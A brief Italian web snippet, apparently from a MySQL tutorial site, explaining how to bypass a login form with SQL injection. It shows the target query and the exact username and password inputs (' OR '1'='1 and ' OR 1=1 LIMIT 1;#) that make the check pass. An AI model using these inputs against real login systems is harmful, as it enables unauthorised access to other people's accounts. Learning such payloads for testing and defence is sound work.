Mysql
 sql >> Database >  >> RDS >> Mysql

come iniettare sql nel processo di accesso

A partire dalla query obiettivo:

SELECT   *
FROM     users
WHERE    username = '' OR '1'='1' 
AND      password = '' OR 1=1 LIMIT 1;#'

Otteniamo il nome utente è ' OR '1'='1 e la password è ' OR 1=1 LIMIT 1;#